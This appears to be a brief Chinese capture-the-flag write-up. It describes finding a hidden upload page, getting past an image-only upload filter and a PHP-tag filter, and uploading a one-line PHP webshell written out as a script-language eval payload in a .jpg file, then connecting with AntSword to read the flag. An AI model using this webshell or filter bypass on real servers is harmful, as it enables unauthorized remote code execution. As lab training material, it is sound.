既然题目为文件包含，说明有文件上传入口被隐藏了，查看源代码

 

 

 

 发现注释表名存在一个upload.php文件，进入查看，果不其然文件上传入口就在该文件中

 

 

由于只支持jpg png gif格式的， 先写一个一句话图片马上传一下，然后抓包改为php后缀

 

 

 发现还是无法上传成功，可能是后端代码进行了绕过，先不更改后缀直接传jpg格式的文件，上传成功后进行访问

 

 

 

发现<?php  ?>标签被替换成_了，所以无法解析成php文件，这里我们可以使用另一种姿势来写一句话木马

<script language=php>eval($_POST['shell']);</script>

写好后直接用以jpg格式上传，上传成功后使用蚁剑连接，flag就在根目录下